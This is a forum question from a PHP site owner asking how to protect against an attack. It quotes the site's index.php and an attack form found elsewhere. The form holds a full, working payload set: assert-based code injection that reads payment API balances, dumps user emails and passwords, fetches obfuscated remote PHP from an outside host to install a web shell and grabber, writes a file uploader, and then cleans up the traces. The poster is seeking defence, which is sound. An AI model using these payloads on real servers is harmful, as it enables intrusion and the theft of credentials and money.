S
S
slooki13372019-02-09 10:10:55
Burglary protection
slooki1337, 2019-02-09 10:10:55

How to protect yourself from hacking?

There is an index.php file

<?php
session_start();
ob_start();
if(isset($_SERVER['HTTP_REFERER']) && !empty($_SERVER['HTTP_REFERER'])){
  $host = parse_url($_SERVER['HTTP_REFERER']);
$host = $host['host'];
  if ($host != $_SERVER['HTTP_HOST']) {
    $time_cookie = time() + (86400 * 15);
    setcookie('httpref', $host, $time_cookie, '/');
  }
}
function __autoload($name)
{
  require 'classes/_'.$name.'.class.php';
}
$db = new db();
new router($db);

On a third-party site, there is a code of the following form
<form id="form1" align="center" method="POST" target="_blank">
  <input value="assert" name="z" hidden />
  <select name="m" size="7">
      <option value="setcookie(&quot;zP&quot;, &quot;zonded&quot;, time()+3600);die(&quot;Сookies set&quot;);" selected>Cookie login</option>
      <option value="@include(&quot;/_class.config.php&quot;);@include(&quot;/_class.rfs_payeer.php&quot;);$c=new config;$p=new rfs_payeer($c-&gt;AccountNumber,$c-&gt;apiId,$c-&gt;apiKey);if($p-&gt;isAuth()){$z=$p-&gt;getBalance();$t=&quot;&lt;h1&gt;&quot;.$z[&quot;balance&quot;][&quot;RUB&quot;][&quot;DOSTUPNO&quot;].&quot; | &quot;.$z[&quot;balance&quot;][&quot;USD&quot;][&quot;DOSTUPNO&quot;].&quot; | &quot;.$z[&quot;balance&quot;][&quot;EUR&quot;][&quot;DOSTUPNO&quot;].&quot;&lt;/h1&gt;&quot;;die(print($t));}else{die(&quot;&lt;h1&gt;#ERROR&lt;/h1&gt;&quot;);}">1. Balance</option>
      <option value="$u=chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(122).chr(111).chr(110).chr(100).chr(101).chr(100).chr(46).chr(114).chr(117).chr(47).chr(102).chr(105).chr(108).chr(101).chr(115).chr(47).chr(112).chr(46).chr(116).chr(120).chr(116);$c=file_get_contents($u);$h=fopen(p.chr(46).php,w);$t=$c;fwrite($h,$t);fclose($h);$h=chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(112).chr(46).chr(112).chr(104).chr(112);@header($h);">2. Grabber money</option>
      <option value="include&quot;/classes/_class.config.php&quot;;$hack=new config;$link=mysql_connect($hack-&gt;HostDB,$hack-&gt;UserDB,$hack-&gt;PassDB);mysql_select_db($hack-&gt;BaseDB,$link);$sql=mysql_query(&quot;SELECT `email`, `pass` FROM `db_users_a`&quot;,$link);while($result = mysql_fetch_array($sql)){echo $result[&quot;email&quot;].&quot;:&quot;.$result[&quot;pass&quot;].&quot;&lt;br&gt;&quot;;}die();">3. Grabber DB</option>
      <option value="$u=chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(122).chr(111).chr(110).chr(100).chr(101).chr(100).chr(46).chr(114).chr(117).chr(47).chr(102).chr(105).chr(108).chr(101).chr(115).chr(47).chr(122).chr(46).chr(116).chr(120).chr(116);$c=file_get_contents($u);$h=fopen(z.chr(46).php,w);$t=$c;fwrite($h,$t);fclose($h);$h=chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(122).chr(46).chr(112).chr(104).chr(112);@header($h);">4. Web-shell</option>
      <option value="@$fp=fopen(&quot;f.php&quot;,&quot;w+&quot;);@$test=fwrite($fp,'&lt;form enctype=multipart/form-data method=post&gt;&lt;input name=userfile type=file&gt;&lt;input type=submit name=go_up&gt;&lt;/form&gt;&lt;?print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};?&gt;');@header(&quot;Location: f.php&quot;);">5. Uploader</option>
      <option value="@unlink(&quot;b.php&quot;);@unlink(&quot;z.php&quot;);@unlink(&quot;f.php&quot;);die(&quot;good&quot;);">6. zCleaner</option>
  </select>
  <input required id="file" class="file1" value="index.php"/><button onclick="link(1)" type="submit">GO</button>
</form>

How to protect yourself from hacks?
With the help of this garbage, you can upload a file to the server, and then call it from the server, and much more.
It is sent by the POST method to index.php, but there is no work with post in index.php. Or is it all about http_refferer?

Answer the question

In order to leave comments, you need to log in

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question